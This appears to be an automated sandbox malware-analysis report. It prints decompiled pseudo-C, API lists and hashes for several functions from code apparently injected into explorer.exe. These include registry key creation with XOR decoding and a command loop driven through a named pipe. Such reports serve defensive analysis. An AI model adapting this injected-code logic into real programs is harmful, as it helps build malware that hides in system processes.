0x000e4ff9
0x000e4ffb
0x000e4fff
0x000e5000
0x000e5002
0x000e500d
0x000e5013
0x000e5025
0x000e5028
0x000e502b
0x000e5038
0x000e5040
0x000e504a
0x000e505c
0x000e5068
0x000e506d
0x00000000
0x000e5002
0x000e4f96
0x000e4ece
0x000e4ece
0x000e4ed4
0x000e4ed6
0x00000000
0x00000000
0x000e4ed8
0x000e4edc
0x000e51e6
0x000e51eb
0x000e51f1
0x000e51f3
0x000e51f4
0x000e51f8
0x000e5208
0x000e520d
0x000e5211
0x000e5213
0x000e5217
0x000e521c
0x000e521e
0x000e5220
0x000e5226
0x000e5226
0x000e5233
0x000e5239
0x000e523f
0x000e5244
0x000e5262
0x000e5264
0x000e5270
0x000e5270
0x000e5276
0x000e5278
0x000e527e
0x000e5290
0x000e5296
0x000e52a2
0x000e52aa
0x000e52aa
0x000e52aa
0x000e52ac
0x000e52b2
0x000e52b2
0x000e4ee2
0x000e4ee5
0x00000000
0x00000000
0x00000000
0x000e4ee5
0x000e4ecc
0x000e4e10
0x000e4e10
0x00000000
0x000e4e10
0x000e4d8e
0x000e4d95
0x000e4d9e
0x000e4da0
0x000e4da6
0x000e4db7
0x000e4dc0
0x000e4dc0
0x000e4dcc
0x000e4dd5
0x000e4dda
0x000e4ddf
0x00000000
0x00000000
0x000e4ddf

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000E4DB3
GetModuleHandleA.KERNEL32(00000000), ref: 000E4DBA
lstrcpynW.KERNEL32(0007FBC8,00000105), ref: 000E5262
lstrcpynW.KERNEL32(0007FDD8,00000105), ref: 000E5276

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: cdb462692889b68eff34d092882432e3bfb7e0ee0f08798b8f3a81ac23893a69
Instruction ID: 15caad44cf0789314faa3b293b86dd16db26a2ef3c8c3b2a5528293ce53d9351
Opcode Fuzzy Hash: cdb462692889b68eff34d092882432e3bfb7e0ee0f08798b8f3a81ac23893a69
Instruction Fuzzy Hash: 75E1D232608381AFE750EF66DC46BAA73E5AF98314F04092DF644E72E2DB74D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000E9B24, Relevance: 6.3, APIs: 4, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E000E9B24(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000E85E5(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E000EB638(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000E95A8(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xfe688; // 0x80000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E000E9273(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E000E9273(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xfe688; // 0x80000
						_t128 =  *0xfe68c; // 0x25bfab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xfe68c; // 0x25bfab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000E85A3( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								RegCloseKey();
								_t155[0x43] = _v8;
								_t101 = E000EC3BB(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000E85FB( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000E85FB( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000E85FB( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E000E9273(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xfe68c; // 0x25bfab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xfe68c; // 0x25bfab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000E95C2( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000E92C6(_v32);
							_v32 = _t179;
							E000E85B6( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E000E9237(_v12);
							_v24 = _t147;
							_t148 =  *0xfe68c; // 0x25bfab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000E85FB( &_v32, 0xfffffffe);
							E000E85FB( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E000E9273(_v12);
						_t171 =  *0xfe684; // 0x25bf8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000E85FB( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x000e9b2d
0x000e9b2f
0x000e9b32
0x000e9b34
0x000e9b3c
0x000e9b3f
0x000e9b46
0x000e9b4e
0x000e9b50
0x000e9b56
0x000e9b5f
0x000e9b67
0x000e9b6d
0x000e9b74
0x000e9b7a
0x000e9b7c
0x000e9b7f
0x000e9b81
0x000e9b81
0x000e9b81
0x000e9b89
0x000e9b8c
0x000e9b91
0x000e9b94
0x000e9b97
0x000e9b99
0x000e9ccf
0x000e9ccf
0x000e9cd5
0x000e9cdc
0x000e9d1d
0x000e9d21
0x000e9d22
0x000e9d28
0x000e9d2d
0x000e9d30
0x000e9d30
0x000e9d32
0x00000000
0x000e9d32
0x000e9ce1
0x000e9ceb
0x000e9cf4
0x000e9cf9
0x000e9cfc
0x000e9cff
0x00000000
0x00000000
0x000e9d01
0x000e9d05
0x000e9d06
0x000e9d0b
0x000e9d0c
0x000e9d0f
0x000e9d13
0x000e9d18
0x00000000
0x000e9b9f
0x000e9b9f
0x000e9bac
0x000e9bb2
0x000e9bb5
0x000e9bb7
0x000e9ccc
0x00000000
0x000e9ccc
0x000e9bc0
0x000e9bc4
0x000e9bcc
0x000e9bd3
0x000e9bd6
0x000e9bd9
0x000e9d35
0x000e9d38
0x000e9d50
0x000e9d53
0x000e9d55
0x000e9da9
0x000e9dac
0x000e9dae
0x000e9db0
0x000e9db0
0x000e9db6
0x000e9db9
0x000e9dbe
0x000e9dc5
0x000e9dcb
0x000e9dd0
0x000e9dd3
0x000e9dd5
0x000e9dec
0x000e9df2
0x00000000
0x00000000
0x00000000
0x00000000
0x000e9dd7
0x000e9dd7
0x000e9de3
0x000e9de7
0x000e9de8
0x000e9de8
0x00000000
0x000e9dd7
0x000e9d5a
0x000e9d67
0x000e9d6a
0x000e9d6c
0x000e9d9b
0x000e9d9e
0x000e9da0
0x000e9da2
0x000e9da2
0x000e9da4
0x00000000
0x000e9da4
0x000e9d6e
0x000e9d77
0x000e9d83
0x000e9d8e
0x00000000
0x000e9d93
0x000e9bdf
0x000e9be0
0x000e9be3
0x000e9be8
0x000e9bec
0x000e9bf1
0x000e9bf4
0x000e9bf7
0x000e9bf9
0x00000000
0x00000000
0x000e9c0a
0x000e9c12
0x000e9c15
0x000e9c17
0x000e9c8c
0x000e9c94
0x000e9c19
0x000e9c1b
0x000e9c2a
0x000e9c32
0x000e9c38
0x000e9c3b
0x000e9c43
0x000e9c46
0x000e9c50
0x000e9c53
0x000e9c58
0x000e9c5b
0x000e9c5d
0x000e9c5f
0x000e9c62
0x000e9c64
0x000e9c66
0x000e9c66
0x000e9c64
0x000e9c72
0x000e9c7d
0x000e9c82
0x000e9c85
0x000e9c85
0x000e9ca4
0x000e9ca9
0x000e9caf
0x000e9cb2
0x000e9cb4
0x000e9cba
0x000e9cc3
0x00000000
0x000e9cc9
0x000e9b99
0x000e9b58
0x00000000

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8ad5372a23e5d4e90071de7be9de3d1923dd299707e82812831e7a48f4390769
Instruction ID: 5b76efb9644cbe12331b9117c7b535ea0b39638f9561434092897669197f2cb9
Opcode Fuzzy Hash: 8ad5372a23e5d4e90071de7be9de3d1923dd299707e82812831e7a48f4390769
Instruction Fuzzy Hash: 1E9127B1904299AFDF10DFAADC459EEBBB8EF48310F104169F514B7262DB359A00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000E3294, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E000E3294() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0xfe674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0xfe684; // 0x25bf8f0
					_push(0x80000);
					_push( *0xfe724);
					_push( *0xfe674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0xfe724; // 0x2760020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000E939F( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E000E1D89(E000E972A( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E000E85E5(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000E9187( *((intOrPtr*)(_t112 + _t84 * 4)), E000EC3BB( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E000E1D89(E000E972A( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000E9498( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0xfe724; // 0x2760020
							E000E96AB( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E000EC35B(_t108);
								 *0xfe758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E000EF7E1( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E000EF7E1( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E000EF803( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E000EC35B(_t109);
										} else {
											if(_t76 == 1) {
												E000EF803( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E000EC35B(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0xfe674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000e329f
0x000e32a1
0x000e32a3
0x000e32a7
0x000e32aa
0x000e32b6
0x000e32c1
0x00000000
0x00000000
0x000e32d4
0x000e32d8
0x000e32d9
0x000e32de
0x000e32e3
0x000e32e9
0x000e32f7
0x000e349b
0x000e3307
0x000e3307
0x000e3310
0x000e3313
0x000e33bb
0x000e33bd
0x000e33c4
0x000e33ca
0x000e33d0
0x000e3449
0x000e3454
0x000e3459
0x000e345c
0x000e33d2
0x000e33d5
0x000e33e1
0x000e33e3
0x000e33e9
0x000e3464
0x000e33eb
0x000e33f0
0x000e33f2
0x000e33f5
0x000e33f7
0x000e3405
0x000e340a
0x000e340d
0x000e340e
0x000e3413
0x000e3416
0x000e341a
0x000e341a
0x000e341f
0x000e342c
0x000e3431
0x000e3434
0x000e3440
0x000e3440
0x000e3466
0x000e3466
0x000e33d0
0x000e3469
0x000e347d
0x000e3482
0x000e348d
0x000e348e
0x00000000
0x000e3319
0x000e3319
0x000e331c
0x000e338a
0x000e338b
0x000e338e
0x000e338f
0x000e3396
0x000e33a1
0x000e33a3
0x000e331e
0x000e331f
0x000e3322
0x000e3372
0x00000000
0x000e3324
0x000e3324
0x000e3327
0x000e335c
0x00000000
0x000e3329
0x000e3329
0x000e332c
0x000e3346
0x000e334b
0x000e334e
0x000e3379
0x000e337a
0x000e337b
0x000e3350
0x000e3350
0x000e3353
0x000e3354
0x000e3354
0x000e337d
0x000e337e
0x000e332e
0x000e3331
0x000e333b
0x000e3361
0x000e3361
0x000e3366
0x000e3367
0x000e3490
0x000e3490
0x000e3491
0x000e3496
0x000e3496
0x000e3331
0x000e332c
0x000e3327
0x000e3322
0x000e331c
0x000e3313
0x000e34a7
0x000e34af
0x00000000
0x00000000
0x00000000
0x000e34af
0x000e34bb

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000E32B9
GetLastError.KERNEL32 ref: 000E32C3

Part of subcall function 000EC35B: FlushFileBuffers.KERNEL32(000001E0), ref: 000EC3A1

DisconnectNamedPipe.KERNEL32 ref: 000E34A7

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: ab5ab430ea76967ac2bc869d0fed58cd835ccd3143a9c6a1befa7b5132d6cbc3
Instruction ID: 982df2f1ec518142b27e8887fad2f35f37031c65dc50634be2b5ded672d10368
Opcode Fuzzy Hash: ab5ab430ea76967ac2bc869d0fed58cd835ccd3143a9c6a1befa7b5132d6cbc3
Instruction Fuzzy Hash: BF51C2B1A00295AEDB21DFB6CC89EEEBBB8EB05300F10446AE105F7191DB759B44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 000E6195, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E000E6195(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E000E85E5(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000E85E5(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E000E85FB( &_v32, 0x3fff);
					E000E85FB( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xfe68c; // 0x25bfab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xfe68c; // 0x25bfab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xfe690; // 0x25bfb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xfe68c; // 0x25bfab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E000EC3D4(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E000EB1F3(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xfe68c; // 0x25bfab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000e6195
0x000e6195
0x000e61a1
0x000e61b0
0x000e61b3
0x000e61bd
0x000e61c5
0x000e61c8
0x000e61d0
0x000e61d2
0x000e61d5
0x000e61da
0x000e6346
0x000e634a
0x000e634a
0x000e61ea
0x000e61ec
0x000e61f2
0x00000000
0x00000000
0x000e6215
0x000e6314
0x000e6318
0x000e631a
0x000e6322
0x000e6322
0x000e632e
0x000e633c
0x00000000
0x000e6341
0x000e621e
0x000e6222
0x000e6226
0x000e622a
0x000e622e
0x000e622f
0x000e6230
0x000e6231
0x000e6232
0x000e6236
0x000e623d
0x000e623e
0x000e6243
0x000e624e
0x000e6263
0x000e6265
0x00000000
0x00000000
0x000e626b
0x000e626e
0x000e6276
0x000e6283
0x000e6288
0x000e628b
0x000e6294
0x000e629b
0x000e62ab
0x000e62b5
0x000e62bb
0x000e62bd
0x000e62c2
0x000e62cb
0x000e62cd
0x000e62cf
0x000e62d1
0x000e62db
0x000e62e1
0x000e62e5
0x000e62e9
0x000e62ee
0x000e62f4
0x000e62f6
0x000e62f8
0x000e62f8
0x000e62ff
0x000e62ff
0x000e62e5
0x000e6304
0x000e6304
0x000e6307
0x000e6308
0x000e630b
0x000e630b
0x00000000
0x000e626e
0x000e6250
0x000e6258
0x00000000

APIs

memset.MSVCRT ref: 000E61B3

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000E620D
memset.MSVCRT ref: 000E6276
memset.MSVCRT ref: 000E6283

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: f8df91fa18871e46c68227d72d69196bb8f0f5506a11d26a652b847feaf77a42
Instruction ID: 13070f67ba0ce8445d0c8d3129192e83f428666132f2474c1e04946bd98b269e
Opcode Fuzzy Hash: f8df91fa18871e46c68227d72d69196bb8f0f5506a11d26a652b847feaf77a42
Instruction Fuzzy Hash: FF5135B2A00249AFEB51DFA9DC85EEE7BB8AF14340F108069F605E7152DB359B04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EB054, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E000EB054(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0xfe698; // 0x25bfbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E000EB988(_t39);
				_t26 =  *0xfe6b8; // 0x25bfbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0xfe688; // 0x80000
					if(E000EBBCF( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0xfe698; // 0x25bfbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0xfe684; // 0x25bf8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E000EC3D4( &_v528) * 2, 0x104);
				return 1;
			}

0x000eb054
0x000eb065
0x000eb077
0x000eb079
0x000eb087
0x000eb096
0x000eb0a1
0x000eb0a9
0x000eb0b6
0x000eb0bc
0x000eb0c0
0x000eb0c2
0x000eb0d6
0x000eb0df
0x000eb0ea
0x000eb0ea
0x000eb0d6
0x000eb0ed
0x000eb0f4
0x000eb112
0x000eb11f

APIs

memset.MSVCRT ref: 000EB079
memset.MSVCRT ref: 000EB087
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000EB0A1

Part of subcall function 000EB988: GetCurrentThread.KERNEL32(00000008,00000000,6CB00000,00000000,?,?,000EBABE,74EC17D9,6CB00000), ref: 000EB99B
Part of subcall function 000EB988: GetLastError.KERNEL32(?,?,000EBABE,74EC17D9,6CB00000), ref: 000EB9A9
Part of subcall function 000EB988: GetCurrentProcess.KERNEL32(00000008,6CB00000,?,?,000EBABE,74EC17D9,6CB00000), ref: 000EB9C2

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000EB112

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: 06e1834b3fd04fc10f65d1c10ff0102f36e509481a86678f5e5a5e9ba7e3c68c
Instruction ID: 3b5ae5d9a0ce6d719027900826768d44106de944a0ff6eaefb8eccc3eaab1c14
Opcode Fuzzy Hash: 06e1834b3fd04fc10f65d1c10ff0102f36e509481a86678f5e5a5e9ba7e3c68c
Instruction Fuzzy Hash: C42190B250111CAFE710EBA4CC89EEB77ACEF48344F4040A5F605E7192EB749E85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000EBF79, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000EBF79(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0xfe68c; // 0x25bfab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E000E85E5(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E000E85FB( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x000ebf97
0x000ebf9a
0x000ebf9d
0x000ebfa8
0x000ebfcc
0x000ec009
0x000ec00c
0x000ec00e
0x000ec016
0x000ec016
0x000ec019
0x000ec01b
0x00000000
0x000ec01b
0x000ebfd6
0x000ebfd8
0x000ebfde
0x00000000
0x00000000
0x000ebffa
0x000ec027
0x000ec02a
0x00000000
0x000ec02a
0x000ec002
0x00000000
0x000ec008
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000E2BFB,00000000), ref: 000EBFA0
RegQueryValueExW.KERNEL32(00000000,000E2BFB,00000000,?,00000000,000E2BFB,00000000,?,?,000E2BFB,00000000), ref: 000EBFC4
RegQueryValueExW.KERNEL32(00000000,000E2BFB,00000000,00000000,00000000,000E2BFB,?,?,000E2BFB,00000000), ref: 000EBFF2
